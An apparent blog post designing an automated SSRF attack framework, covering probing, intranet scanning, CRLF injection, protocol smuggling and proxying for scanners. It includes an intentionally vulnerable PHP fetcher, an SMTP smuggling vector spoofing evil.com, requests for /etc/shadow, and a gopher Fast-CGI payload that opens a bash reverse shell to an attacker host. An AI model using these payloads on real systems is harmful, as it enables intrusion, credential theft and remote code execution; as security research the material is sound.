All you need to know about SSRF and how we may write tools to detect it automatically


Ah… Forgot to post it on my blog

Abstract

Server Side Request Forgery (SSRF) has long been known to security researchers. However, because its exploitation depends on vulnerabilities in the intranet rather than in the target itself, many researchers overlook the damage it can cause. This neglect has led to a lack of SSRF attack tools. But we should not belittle this attack: there are many examples of gaining intranet control through SSRF (for example, Wooyun identifiers WooYun-2015–0163792 and WooYun-2015–099070). To help security researchers make use of the vulnerability, this research proposes the details of implementing an SSRF attack framework.

Keywords: Server Side Request Forgery, attack framework, intranet, vulnerabilities

Summary: This paper proposes a detailed implementation of every step: SSRF probing, intranet host/port scanning, supported-protocol probing, and automatic exploitation. I will use a server to record HTTP requests, which lets me confirm whether a target has visited the specified site. Additionally, we will present how to use SSRF as a proxy. In proxy mode, the attacker can chain other tools such as W3af, sqlmap, and Burp Suite. With the above features, we can release the full power of SSRF.

1 Introduction

1.1 Brief introduction of Server Side Request Forgery

Imagine you have a worker who helps you carry goods out of a factory. If the worker does not check whether the goods belong to you, you can ask him or her to bring out other people’s goods. Servers with a Server Side Request Forgery (SSRF) vulnerability act just like that careless worker. They typically help users fetch files or images but do not check the destination. So an attacker can ask the server to return resources from the private network, and the server becomes a proxy for attacking the intranet. An attacker can use it to bypass a firewall or NAT and reach the private network; as a result, vulnerabilities inside the private network (e.g. PHP Fast-CGI unauthorized requests, which allow the execution of PHP code) might be exploited. Alternatively, attackers might use a protocol like file:// to read the local system’s files (e.g. /etc/passwd, which lists the user accounts on a Linux operating system), or launch a DoS (Denial of Service) attack against the internal network. Here is a picture to illustrate how SSRF works [1]:

Figure 1: SSRF illustration

To be more concrete, imagine a server that fetches an image for us. Consider the following code:

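<?php
// Deliberately vulnerable example: the server fetches whatever URL the client supplies.
if (isset($_POST['url'])) {
    // The destination is never validated; this is the SSRF.
    $content = file_get_contents($_POST['url']);
    $filename = './images/' . rand() . 'img1.jpg';
    file_put_contents($filename, $content);
    echo $_POST['url'];
    $img = "<img src=\"" . $filename . "\"/>";
    echo $img;
}
?>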

The user sends a URL via the POST method, and the server fetches the image and displays it. What if we send the server an intranet address? We get content from the private network back in the returned image! In this way, we can bypass the firewall. Except for some special cases (file protocol, PHP protocol), SSRF does not affect the vulnerable server itself. Instead, the attacker uses it as a jump server to access the private network. Thus, the vulnerabilities in the intranet determine the damage of an SSRF attack.

1.2 Current Problems

Consequently, to make use of SSRF, you need to probe the internal network. What’s worse, if the response contains only an HTTP status rather than detailed content, it is difficult to exploit the attack without tools. Unfortunately, there is no killer application among current SSRF exploitation software. Even Skanda [3], an SSRF exploitation tool provided by OWASP (Open Web Application Security Project), supplies only limited functions, namely detecting SSRF vulnerabilities and scanning local ports.

Yin Wang, also known as ringzero, proposed an automatic SSRF exploitation technique at Wooyun Summit 2016. He only covered the scenarios in which SSRF might occur and the known vulnerabilities that can be used in an SSRF attack; his report neglected the importance of information gathering and protocol smuggling. This is far from enough. As attackers, we need to know as much as possible, such as all the live IP addresses in the internal network. In some cases, the server with SSRF only indicates whether the URL is reachable, so we need ways to gather fingerprints (sensitive data that leaks information about a server, such as its operating system or web framework) in order to choose the correct payloads (special requests that allow an attacker to control the server or obtain protected data). When the server can give us the responses of hosts in the private network, we want to use better tools to scan the intranet; our SSRF can then be set up as a proxy that relays data from the scanner to the target. What’s more, SSRF might be used as an anonymous agent to help us attack other servers and hide our own footprints.

To implement such functions, we need to create a new SSRF framework. Many questions remain: how can we map the intranet layout fastest, how do we get the most precise fingerprints when the server does not give us content from other hosts, and which protocols can we use to maximize our attack surface? In the remaining sections, I give an overall introduction to my design and use some tricks to solve these problems.

2 Method

2.1 Classification of SSRF

Before we enter the topic of exploitation, we need to classify SSRF and find out each type’s properties. After observing many cases, we separate SSRF into five types: content based, bool based, error based, blind, and special SSRF. Different types of SSRF cause different degrees of damage. These types can be sorted into two cases: direct and indirect SSRF.

2.1.1 Direct SSRF

With the first three types of SSRF, attackers can confirm whether the server has visited an address. The first, content based, means that the body of the server’s response contains the content of the URL you specified. Bool based SSRF [4] does not return content; the response merely carries an HTTP status code. When the specified URL is unreachable, the server sends back a status code such as 404 (page not found) or 500 (internal server error) to tell the client that the URL could not be requested. Because we can tell directly which URLs the server visited and which were unreachable, these three types are easier for scripts to detect automatically. Content based and error based SSRF are exploitable in most cases.

2.1.2 Indirect SSRF

Not all servers return an error code when the destination host is down, but one thing they have in common is that they retry many times before the connection is closed. Thus, we can use the difference in time to confirm whether a host is alive: when the server takes much longer to respond, we can infer that the specified host is not up. Blind SSRF is the most difficult type to exploit, because the attacker cannot know whether the payload was sent successfully. The special type refers to uncommon forms of SSRF. For example, a server might return “true” in the response body when the request succeeds and “false” otherwise. This looks like error based SSRF, but the two are quite different. Moreover, such a clean example only happens in an ideal environment. In a real network, we will very likely need to filter out noise that the server adds to the response body. For instance, it might send back JSON in the following format:

{"url":"example.com", "access":"false"}

So we need to identify the part that reflects the server’s status and filter out a whole lot of other data. Error based SSRF, by contrast, merely gives us an HTTP status code, which falls in a fixed range. What’s worse, some servers include variable data such as the current time in the HTTP body. As a result, filtering is an extremely difficult task for our program. To solve the problem, I will introduce a technique called “tamper”, which allows attackers to apply their own method to filter data according to their requirements. Time based and blind SSRF are almost unexploitable, because we cannot reliably tell whether the requested URL is reachable. Content based SSRF, however, needs the user to implement a “tamper” (mentioned later) to help the framework know whether a URL is reachable.
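To make the idea of a “tamper” more concrete, here is a minimal sketch of what one could look like for the JSON response above. The function name json_flag_tamper, the status_key parameter, and the extra "time" field in the sample bodies are my own assumptions for illustration, not part of any existing tool.

```python
import json


def json_flag_tamper(body, status_key="access"):
    """Return True if the response body says the fetch succeeded.

    Hypothetical tamper: only the field named by status_key is inspected,
    so noise elsewhere in the body (timestamps, echoed URLs) is ignored.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return False  # not JSON at all: treat the URL as not reachable
    if not isinstance(data, dict):
        return False
    return str(data.get(status_key, "")).strip().lower() == "true"


# Two sample bodies that differ in the status flag and in a noisy time field.
ok_body = '{"url": "example.com", "access": "true", "time": "12:00:01"}'
bad_body = '{"url": "example.com", "access": "false", "time": "12:00:02"}'
print(json_flag_tamper(ok_body), json_flag_tamper(bad_body))
```

Because the tamper is just a function from a response body to a yes/no answer, each target can get its own without touching the rest of the framework.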

2.2 Probe SSRF

Before exploiting, we need to determine whether a server has SSRF. In most cases, the attacker specifies a URL as the payload and sends it to the target through an HTTP GET parameter or HTTP POST data (we will use the term ‘SSRF vector’ for these in the rest of the article). We replace each parameter in turn with the specified URL and test the response. Note that the payload should be URL encoded; otherwise, its special characters (such as ‘?’, ‘&’ and ‘#’) might cause the request to malfunction. For instance, suppose the target has SSRF in the URL http://target.com/?u=xxURLxx, where xxURLxx is the SSRF vector. If we want it to connect to http://example.com/?id=1&allow=yes and substitute that for xxURLxx unencoded, the request becomes http://target.com/?u=http://example.com/?id=1&allow=yes. The target then sees two parameters of its own, u and allow, because ‘&’ separates query parameters (see RFC 3986 for the reserved characters), and the URL it fetches loses allow=yes. Of course, if a security researcher has identified the SSRF manually, they can state the position of the SSRF vector by placing xxURLxx in the GET parameter or POST data.
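The encoding problem is easy to see with Python’s standard urllib.parse. The sketch below is only an illustration; the helper name build_vector is hypothetical, and xxURLxx is the placeholder used in this article.

```python
from urllib.parse import parse_qs, quote, urlsplit

PLACEHOLDER = "xxURLxx"


def build_vector(template, payload_url):
    """Substitute the payload for the placeholder, percent-encoding every
    reserved character so the target sees it as one parameter value."""
    return template.replace(PLACEHOLDER, quote(payload_url, safe=""))


template = "http://target.com/?u=xxURLxx"
payload = "http://example.com/?id=1&allow=yes"

raw = template.replace(PLACEHOLDER, payload)  # unencoded substitution
encoded = build_vector(template, payload)

# How the target would split each query string into parameters.
print(parse_qs(urlsplit(raw).query))
print(parse_qs(urlsplit(encoded).query))
```

In the unencoded case the target parses u and allow as two separate parameters; in the encoded case it receives the whole payload URL as the value of u.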

2.2.1 Basic Probe

We have introduced the classification of SSRF; in this section, we describe methods of probing for the vulnerability. The basic probe only indicates whether a server has SSRF and does not classify its type. We set up several servers and enable wildcard DNS and HTTP logging. The attack framework asks the target to send several requests to our server, using domains of the form <a 10-digit random number>.ourdomain.net. The ten-digit number is a unique ID for the target, which we match against our server’s records to identify it. If the target does visit our site, its DNS lookup and HTTP request are stored. The framework then connects to our server and uses the random number to check whether the target has visited it.
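The token bookkeeping of the basic probe can be sketched as follows. This is a simplified illustration under my own assumptions: the function names are hypothetical, and logged_hosts stands in for whatever list of host names the logging server has recorded.

```python
import secrets


def make_probe_host(base_domain="ourdomain.net"):
    """Create a 10-digit random token and the probe host name built from it."""
    token = "".join(secrets.choice("0123456789") for _ in range(10))
    return token, f"{token}.{base_domain}"


def token_was_seen(token, logged_hosts):
    """Check whether any recorded host name starts with our token label."""
    return any(host.lower().split(".")[0] == token for host in logged_hosts)


token, probe_host = make_probe_host()
print(probe_host)

# Pretend the logging server recorded these host names (assumed sample data).
print(token_was_seen(token, ["www.ourdomain.net", probe_host]))
```

Using a fresh token per target means a hit in the log can be attributed to exactly one probe, even when several targets are tested at once.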

2.2.2 Advanced Probe

After finishing the previous process, the attacker can use the advanced probe to identify the specific type of SSRF. First, our framework sends invalid URLs (malformed scheme, invalid address, unreachable port, etc.) to detect whether the server responds with an error code. After that, we give an invalid address as the target of the server’s request and measure how long the response takes, which reveals time based SSRF. Readers should note that error based detection needs to come before time based detection. We found that some error based SSRF also spends a long time connecting to an unreachable port before responding with an error code. Thus, it is necessary to detect error based SSRF first. To confirm content based SSRF, our framework asks the server to retrieve a specific file from our server. Once the returned data includes the whole content of the file, we can confirm that the SSRF is content based.
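The ordering constraint (error based before time based) can be expressed as a small decision function. This is only a sketch under assumptions of my own: the Observation record, the slow_factor threshold, and checking for content first are illustrative choices, not the framework’s actual logic.

```python
from dataclasses import dataclass


@dataclass
class Observation:
    status: int     # HTTP status returned by the target
    elapsed: float  # seconds the target took to answer
    body: str       # response body returned by the target


def classify(valid, invalid, marker, slow_factor=3.0):
    """Guess the SSRF type from one valid-URL and one invalid-URL observation.

    marker is the content of the file hosted on our own server.
    """
    if marker in valid.body:
        return "content based"
    # Error based is checked before time based: some error based targets
    # are also slow on unreachable ports before they return the error code.
    if valid.status != invalid.status:
        return "error based"
    if invalid.elapsed > slow_factor * valid.elapsed:
        return "time based"
    return "blind or special"


print(classify(Observation(200, 0.2, ""), Observation(500, 5.0, ""), "MARK"))
```

The sample call describes a target that is both slow and returns a different status for the invalid URL; it is reported as error based because that check runs first.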

2.3 Scan the Intranet

One of the most crucial functions of SSRF is attacking the intranet. Before we exploit it, we need to know the running hosts and their addresses. The private IP ranges are 10.0.0.0–10.255.255.255, 172.16.0.0–172.31.255.255, and 192.168.0.0–192.168.255.255 (RFC 1918), which together contain more than 17,000,000 addresses. Requesting the target to access every IP one by one is impractical. The user can narrow the range by using a DNS zone transfer or by finding leaked information, but such tasks are hard to automate, so we leave them to the user. Thus, our scanner only probes a single IP or a network segment specified by the user. To increase speed, we scan a list of common ports used by common applications rather than all ports. Here is part of our port list (the first column is the port number, the second is the corresponding service name):

Port Service
22 SSH
80 HTTP
443 HTTPS

Besides popularity, we consider whether a service supports a text-based protocol. If it does, it is easier for us to customize the server’s request (the reason is given in section 2.4).
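The size of the RFC 1918 space, and the much smaller work list that results from scanning only a user-specified segment with a short port list, can be checked with the standard ipaddress module. The names PRIVATE_BLOCKS, COMMON_PORTS and scan_targets are hypothetical, and the port list is just the excerpt shown above.

```python
import ipaddress
from itertools import product

PRIVATE_BLOCKS = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16"]  # RFC 1918
COMMON_PORTS = {22: "SSH", 80: "HTTP", 443: "HTTPS"}  # excerpt only

# Total number of private addresses: too many to probe one by one.
total_private = sum(ipaddress.ip_network(b).num_addresses for b in PRIVATE_BLOCKS)
print(total_private)


def scan_targets(segment, ports=COMMON_PORTS):
    """Yield host:port strings for every usable host in a user-given segment."""
    network = ipaddress.ip_network(segment, strict=False)
    for host, port in product(network.hosts(), ports):
        yield f"{host}:{port}"


print(list(scan_targets("192.168.0.0/30")))
```

A /24 segment with these three ports gives 762 requests, which is a realistic amount to push through a single SSRF vector.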

Protocols can extend the attack surface of SSRF. The classic example is using the file protocol to retrieve password data directly (e.g. file:///etc/shadow). What’s more, attackers can use the gopher protocol to compose arbitrary text based requests [5]. Thus, finding out which protocols are supported is important for exploiting targets. Here is a list of exploitable protocols summarized by Yin Wang [6]:

file:// - Accessing local filesystem
http:// - Accessing HTTP URLs
ftp:// - Accessing FTP URLs
php:// - Accessing various I/O streams
data:// - Data protocol (RFC 2397)
phar:// - PHP Archive
gopher:// - A protocol designed for menu-driven document retrieval
dict:// - Dictionary protocol

Figure 3: Example protocols

However, the attacker cannot use every protocol. Some might be filtered by the firewall, and others might not be supported by the programming language. How do we match a port with its protocol? Basically, we change the scheme of the URL and inspect the server’s response (HTTP status code, time, and response body), so our SSRF vector takes the following format:

<current scheme>://url:port

If the response code is normal in error based SSRF, or the response is filled with content in content based SSRF, we can confirm that the protocol is supported by the host. Testing every supported scheme against every port is inefficient. Thus, we match a port with its default protocol first (e.g. HTTP matches port 80, FTP matches port 21). After that, our framework tests the remaining protocols.
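The “default protocol first” ordering can be sketched like this. The mapping and scheme list below are small assumed examples (port 21 is FTP’s registered default), and candidate_vectors is a hypothetical helper name.

```python
# Assumed example tables; a real list would be longer.
DEFAULT_SCHEME = {21: "ftp", 80: "http", 443: "https"}
NETWORK_SCHEMES = ["http", "https", "ftp", "gopher", "dict"]


def candidate_vectors(host, port):
    """Return scheme://host:port candidates, with the port's default first."""
    first = DEFAULT_SCHEME.get(port)
    ordered = ([first] if first else []) + [s for s in NETWORK_SCHEMES if s != first]
    return [f"{scheme}://{host}:{port}" for scheme in ordered]


print(candidate_vectors("192.168.0.5", 21))
```

For a port with no known default, the candidates are simply tried in list order.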

2.4 How to Send Custom-Build Request

In the previous part of the paper, I mentioned that SSRF lets us make the target send a request to a specific URL and return the response to us. We can simply use the server to send GET requests. However, we only control the URL; the remaining parameters (e.g. cookies, user-agent, and POST data) are generated by the server. Unfortunately, in some cases we need to add or modify these parameters. For instance, suppose a CMS (Content Management System) in the intranet has a SQL injection vulnerability when parsing a header of an HTTP request. All we control is the URL, so how can we add a header? CRLF injection [7] is quite useful here. CRLF injection lets us send Carriage-Return (ASCII 13, \r) and Line-Feed (ASCII 10, \n), the pair of characters used to terminate a line of an HTTP request. Since each header in an HTTP request sits on its own line, injecting a CRLF starts a new header line.

2.4.1 Using CRLF injection to add HTTP parameter

By injecting an encoded CRLF into the URL, we can add new parameters to the server side’s request. The following picture illustrates the process:

//Attacker's request
GET ?url=http://example.com/%0d%0aReferer:localhost
Host:www.target.com
...

//Server's request
GET http://example.com
Referer:localhost
...

Figure 4: Add parameters by CRLF injection

Imagine that www.target.com has an SSRF vulnerability and we ask it to visit the URL http://example.com/%0d%0aReferer:localhost. In this URL, %0d%0a is the URL encoded form of CRLF. When the server parses the URL, %0d%0a is automatically decoded into carriage-return and line-feed characters. Thus, we get a new line with our custom-built parameter (the Referer). This happens in any decoding process that fails to check characters. CRLF injection is not all-purpose: some servers do not decode URL encoding, while others filter out CRLF characters. To detect CRLF injection, we place a CRLF followed by a random number at the end of our server’s URL and ask the target to request that special URL. If our server records an additional line break followed by the random number, we can confirm that the target has CRLF injection. Besides CRLF injection in HTTP, we can use other protocols to construct more powerful payloads, which are covered in section 2.7.
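Both halves of this check, the decoding that creates the new line and the test on what our own logging server received, can be sketched as follows. The helper names and the sample raw requests are assumptions for illustration; a real recorded request may look different depending on the target’s HTTP client.

```python
from urllib.parse import unquote


def build_crlf_probe(base_url, token):
    """Append an encoded CRLF followed by a random token to our server's URL."""
    return f"{base_url}%0d%0a{token}"


def crlf_was_injected(raw_request, token):
    """True if the token starts a line of its own in the recorded request."""
    lines = raw_request.split(b"\r\n")
    return any(line.startswith(token.encode()) for line in lines[1:])


# Percent-decoding turns %0d%0a into a real line break.
decoded = unquote("http://example.com/%0d%0aReferer:localhost")
print(repr(decoded))

# Assumed samples of what our logging server might record.
injected = b"GET /\r\n1234567890 HTTP/1.1\r\nHost: probe.example\r\n\r\n"
untouched = b"GET /%0d%0a1234567890 HTTP/1.1\r\nHost: probe.example\r\n\r\n"
print(crlf_was_injected(injected, "1234567890"), crlf_was_injected(untouched, "1234567890"))
```

When the target does not decode the sequence, the token stays inside the request line and the check reports no injection.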

2.4.2 Use CRLF injection to smuggle other protocols

More precisely, we can smuggle one protocol inside another. Orange Tsai has provided a list of protocols that are suitable for smuggling [9], which includes:

HTTP based: Elastic, CouchDB, MongoDB, Docker

Text based: FTP, SMTP, Redis, Memcached

These protocols let attackers turn one request into another exploitable protocol by adding encoded characters. For example, if there is an SMTP server without authentication in the intranet, we can construct the following SSRF vector:

https://address%0D%0AHELO evil.com%0D%0AMAIL FROM...:25/

The SMTP server would receive:

GET /
HOST:address:25
HELO evil.com
MAIL FROM...

Although the first two lines are invalid for the SMTP protocol, the next two lines make the server send a forged mail (using the forged identity evil.com). When we receive the mail with the forged identity, we can assume that the port is open and occupied by an SMTP server.

2.5 Content Based SSRF Exploitation

Content based SSRF gives attackers the clearest view of what the server retrieves. Thus, we can get the fullest fingerprints of the intranet. From the server’s responses, a security researcher may manually find SQL injection, remote command execution, and so on. But implementing every vulnerability testing tool inside our framework is time consuming, and it also violates the K.I.S.S. principle (Keep It Simple, Stupid). Thus, our framework acts as a proxy and forwards data to existing vulnerability exploitation tools.

2.5.1 SSRF proxy

HTTP/1.1 defines eight methods: GET, POST, HEAD, TRACE, PUT, DELETE, OPTIONS, and CONNECT. Normally, specifying a URL only lets us make the server use the GET method. When the body of a POST request merely contains parameters, GET and POST requests are interchangeable, although certain servers may still reject the converted request. How can we support as many parameters as possible? One way is CRLF injection, but it might cause HPP (HTTP Parameter Pollution). For instance, if the server uses a specific user agent to request web sites and we want to add our own user agent, the following happens (parameter url is the SSRF vector):

//Attacker's request
GET ?url=http://example.com/%0d%0aUser-Agent:Chrome
Host:www.target.com

//server's request
GET http://example.com
user-agent:Chrome
user-agent:Python URLlib

Figure 5: Add UA through CRLF

Some servers reject HPP requests, while others accept them. After extending the request methods and parameters, we can offer an HTTP proxy to other tools. Facing a large number of requests, we decided to handle them with multiple threads.
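The duplicated header in Figure 5 is easy to reproduce offline. The sketch below uses the standard email parser, which reads the same "Name: value" line format that HTTP headers use, to show that both User-Agent values survive parsing; the helper name duplicated_headers and the sample header block are assumptions for illustration.

```python
from collections import Counter
from email import message_from_string


def duplicated_headers(raw_headers):
    """Return {header name: [values]} for every header that appears twice or more."""
    message = message_from_string(raw_headers)
    counts = Counter(name.lower() for name in message.keys())
    return {name: message.get_all(name) for name, n in counts.items() if n > 1}


# Header block as the intranet host would see it after the CRLF injection.
polluted = (
    "User-Agent: Chrome\r\n"
    "User-Agent: Python-urllib\r\n"
    "Host: example.com\r\n"
    "\r\n"
)
print(duplicated_headers(polluted))
```

Which of the two values a receiving server actually honours depends on its implementation, which is why some servers accept such requests and others reject them.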

2.5.2 Debate: Whether we should filter data from the proxy

In many cases, the target does not return exactly the data that it fetched through the SSRF vector. Consider the following code:

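<?php
// Fetch the user-supplied URL, then echo the URL and the fetched content.
$content = file_get_contents($_GET['url']);
// The URL is echoed without any filtering.
echo 'We visited: ' . $_GET['url'];
echo $content;
?>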

Figure 6: Sample PHP code

The response contains not only the content but also an extra line, We visited: . This line does not come from the response to the SSRF vector. Tools using our proxy therefore might not get the most accurate response, but we still believe it is necessary to keep this extra context, because extra context typically brings extra attack surface. Look back at Figure 6. The page echoes user-controlled data without filtering, which causes a reflected XSS. An attacker can submit http://evil.com/%3Cscript%3Ealert(1)%3C/script%3E to validate it. To conclude, eliminating extra context is not good for discovering extra attack surface.

2.6 Error Based SSRF Exploitation

Attackers cannot get content from error based SSRF. Consequently, other tools are unlikely to help us get data. All we know is whether the server successfully accessed a URL. This means we can use neither vulnerabilities that rely on response bodies nor interactive payloads. Therefore, only by requesting specific paths can we infer the Web service or framework. These paths are unique to particular Web frameworks or services. For instance, if we can access the paths /jmx-console/ and /invoker/JMXInvokerServlet, the host is very likely running JBoss. If we can confirm a host’s framework, we have a chance to attack it with a public payload. However, the payload can only use the GET or POST method; otherwise we cannot send a correct request. And during exploitation, the payload must not depend on content from the server’s response. Despite all these restrictions, there are still many exploitable payloads for error based SSRF [8]:

Bug ID Description
S2–045 Struts 2 Remote Code Execution (Jakarta Multipart parser)
PACKETSTORM:131185 JBoss JMXInvokerServlet Remote Command Execution

Figure 7: Sample vulnerabilities

Of course, these payloads can also be applied to content based SSRF. Although the server cannot send back the content itself, we can make the vulnerable host issue DNS or HTTP requests to carry data out.
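The path-based fingerprinting described in this section boils down to a lookup table. Here is a minimal sketch: the FINGERPRINTS table contains only the JBoss paths named above, and guess_frameworks and its scoring rule are my own assumptions for illustration.

```python
# Paths taken from the JBoss example in this section; a real library is larger.
FINGERPRINTS = {
    "JBoss": ["/jmx-console/", "/invoker/JMXInvokerServlet"],
}


def guess_frameworks(reachable_paths):
    """Score each framework by the fraction of its known paths that were reachable."""
    reachable = set(reachable_paths)
    scores = {}
    for name, paths in FINGERPRINTS.items():
        hits = sum(path in reachable for path in paths)
        if hits:
            scores[name] = hits / len(paths)
    return scores


# Paths that the error based SSRF reported as reachable (assumed sample data).
print(guess_frameworks(["/", "/jmx-console/", "/invoker/JMXInvokerServlet"]))
```

A score below 1.0 means only some of the known paths answered, which is a weaker hint than a full match.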

2.7 Using Non-HTTP Protocols to Exploit

2.7.1 File Protocol

We detected a number of protocols in the previous part. Besides attacking the intranet, SSRF gives us a chance to access the server’s file system directly. We can try fetching /etc/passwd and /etc/shadow. Moreover, attackers can read /proc to get other sensitive information such as running applications, machine hardware details, and so on. The SSRF attack framework stores a list of the locations of sensitive files and uses them as SSRF vectors to get as much information as possible.

2.7.2 Gopher Protocol

Combining gopher with SSRF is like giving the attacker a proxy with few restrictions. Gopher gives attackers the greatest freedom to interact with different protocols, because it accepts URL encoding (so CRLF injection is possible) and has no headers or response body (so there is no HPP). If we find a service such as Redis or Fast-CGI, we can construct a special gopher request to attack it. For instance, suppose our scanner detects a Fast-CGI service on port 9000 of the intranet host 192.168.0.5. Then we can use the following payload in our SSRF vector:

gopher://192.168.0.5:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR192.168.0.5%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/YourHost/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00

Clearly, constructing such a payload manually is complicated. The attack framework helps the attacker generate and encode payloads through automatic encoding, keyword replacement, and vulnerability detection.

3 Result and Discussion

We use several Python libraries (socketserver, urllib, httpserver, random, time, re) to implement the tool. It detects and exploits as the previous sections describe. However, a request through the proxy takes about 1 second longer than a direct request, which might prolong scanning time for scanners. Also, the collected fingerprints are limited, so some vulnerabilities in the intranet might be missed; we still need to spend time expanding the fingerprint library.

So far, we have only finished an HTTP based SSRF attack framework. For other places where SSRF might occur, such as XML parsing engines or databases, we have not yet created a tool to support exploitation. These special kinds of SSRF require different encodings. Time based and blind SSRF give us only limited information, and we do not yet have an appropriate method to exploit them. Furthermore, we need to design an API (Application Programming Interface) for secondary development to meet different purposes. Our framework cannot recognize charsets automatically. When the response from the SSRF vector needs a specific charset to be displayed, a browser using the proxy will show garbled text, which hinders us from finding leaked information. Besides SSRF in servers, browsers [10] and reverse proxies [11] have such bugs, too. We have not discussed them yet. Constructing an attack framework for them will be totally different (e.g. you need to change the DNS record to trick the target into connecting to an intranet address).

4 Conclusion

In this paper, we analyzed different types of SSRF and methods to exploit them. What’s more, each section reminds readers of possible problems such as encoding. The framework aims to help security researchers find and make use of SSRF in a simpler way. We believe this tool will help eliminate more SSRF vulnerabilities.

References

  • [1] Freebuf. SSRF Attack Analyze. http://www.freebuf.com/articles/web/20407.html (2013)

  • [2] Infosec Institute. The SSRF vulnerabilities. http://resources.infosecinstitute.com/the-ssrf-vulnerability (2016)

  • [3] OWASP. OWASP Skanda SSRF Exploitation Framework. https://www.owasp.org/index.php/OWASP_Skanda_SSRF_Exploitation_Framework (2013)

  • [4] Wulala. Thinking and Practice of Bool Based SSRF. http://www.secevery.com:4321/drops/web-7550.html (2015)

  • [5] Zheng R. Use Gopher Protocol to Extent Attack Surface. (2016)

  • [6] Wang Y. How to Construct Your SSRF Exploit Framework, page 36. Wooyun Summit 2016. (2016)

  • [7] Prasad P. CRLF Injection/HTTP Response Splitting Explained. https://prakharprasad.com/crlf-injection-http-response-splitting-explained/ (2011)

  • [8] Wang Y. How to Construct Your SSRF Exploit Framework, page 47, 48. Wooyun Summit 2016. (2016)

  • [9] Tsai O. A New Era of SSRF — Exploiting URL Parser in Trending Programming Language. Black Hat 2017. (2017)

  • [10] mpgn. Bypass Same Origin Policy. https://github.com/mpgn/ByP-SOP (2016)

  • [11] Kettle J. Cracking the Lens: Targeting HTTP’s Hidden Attack-Surface. http://blog.portswigger.net/2017/07/cracking-lens-targeting-https-hidden.html. Black Hat 2017 (2017)
